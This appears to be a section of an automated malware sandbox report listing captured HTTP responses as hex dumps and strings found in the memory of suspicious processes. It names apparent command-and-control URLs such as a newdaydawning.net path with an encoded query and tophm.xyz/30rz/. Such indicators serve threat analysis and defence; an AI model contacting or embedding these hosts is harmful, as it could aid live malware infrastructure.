a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:49 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 09 Oct 2024 12:02:51 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 
69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 
2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 
2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:03:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 
2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:03:05 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 
6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: NETSTAT.EXE, 0000000B.00000002.2583392591.00000000045F8000.00000004.10000000.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000002.2581565135.0000000002C88000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeth
            Source: NU1aAbSmCr.exe, 00000000.00000002.1350243310.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: mCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tophm.xyz
            Source: mCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tophm.xyz/30rz/
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
